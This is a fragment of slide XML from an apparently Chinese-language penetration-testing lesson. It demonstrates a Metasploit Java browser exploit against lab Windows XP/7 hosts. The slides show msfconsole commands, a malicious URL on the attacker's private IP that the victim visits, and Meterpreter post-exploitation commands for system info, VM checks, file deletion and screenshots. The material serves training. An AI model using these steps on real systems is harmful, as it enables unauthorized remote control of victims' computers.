              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>端口占用问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C00F9ABE-169C-B0F2-B7A3-5A2A2B36197F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091924" y="1955351"/>
            <a:ext cx="10008152" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>思考：突然某个人给你发一个链接，你会不会直接点开？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/qq_53517370/article/details/128984794</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57E4D288-BBD5-F5FD-71FD-147271D43E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3186595" y="4848126"/>
            <a:ext cx="8918319" cy="1494169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26559065-0C13-08F0-F9C4-CB2F384B74E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585106" y="2875034"/>
            <a:ext cx="11175093" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1045C9"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Windows OLE远程代码执行漏洞，OLE（对象链接与嵌入）是一种允许应用程序共享数据和功能的技术，远程攻击者利用此漏洞通过构造的网站执行任意代码。通过生成一个恶意链接，让用户点击后，访问攻击者指定的ip下载并执行恶意程序，攻击者就能链接到用户的电脑。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33041562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CE4C82A-96BC-167B-0223-6C10D83807EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="445434" y="941469"/>
            <a:ext cx="10001273" cy="5930734"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85CC1121-4184-F86F-AED2-197CBA20727F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4109185" y="3906836"/>
            <a:ext cx="7637381" cy="2914709"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2475708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7E857E9-2019-7741-F456-8B9B6336F305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584200" y="1288534"/>
            <a:ext cx="7874000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>环境的漏洞获取 shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBF82446-BA4A-6642-71C3-3AEB4B176D48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584200" y="1999987"/>
            <a:ext cx="7874000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>先安装 java 环境上传 jre 到 win7 操作系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9A88C1A-744B-9EE6-8E79-182C66F34109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584200" y="2508877"/>
            <a:ext cx="11671300" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf5 &gt; use exploit/multi/browser/java_jre17_driver_manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf5 exploit(multi/browser/java_jre17_driver_manager) &gt; show options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77356C92-03C8-4ABD-D1AA-6DD5E6BD148B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584200" y="3339874"/>
            <a:ext cx="11544300" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf5 exploit(multi/browser/java_jre17_driver_manager) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SRV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>HOST 192.168.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>77</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>128</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf5 exploit(multi/browser/java_jre17_driver_manager) &gt; exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F45646-9453-5406-FDB0-0DB7A83D4D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1694180" y="4437896"/>
            <a:ext cx="7111271" cy="1866384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3697505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22" y="1167891"/>
            <a:ext cx="6172022" cy="5013427"/>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5497" y="1147579"/>
            <a:ext cx="6976188" cy="5033739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3960515-22E8-1FBB-1EAC-78BDC3267313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="84222" y="22188"/>
            <a:ext cx="3115710" cy="817056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14708478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B47D59C-D596-DBFE-079F-672F7BB515C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876300" y="1357017"/>
            <a:ext cx="8178800" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>在 win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 上安装 java 环境</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 主机访问 http://192.168.1.53:8080/bUry5GxBnxluT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2623071-1182-2A8E-5B9E-2BEE7C09F6E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876300" y="2188014"/>
            <a:ext cx="7874000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提示我们 java 版本需要更新我们点击 later 先不更新</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A1CF237-30F5-E7A3-82C2-8801BC07E0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876300" y="2649679"/>
            <a:ext cx="10655300" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>此时，运行了一个 java 程序,用户关闭了 java 程序也不影响我们 session 的正常访问。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FBC54B5-D408-9CEB-B3C1-A59DF9796127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3057418" y="3531476"/>
            <a:ext cx="4596247" cy="2716924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11423912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39257" y="1792848"/>
            <a:ext cx="10713485" cy="5617692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取目标主机详细信息：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检查是否运行虚拟机：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &gt; run post/windows/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>checkvm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>访问文件系统：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &gt; rm desktop.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>屏幕截图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
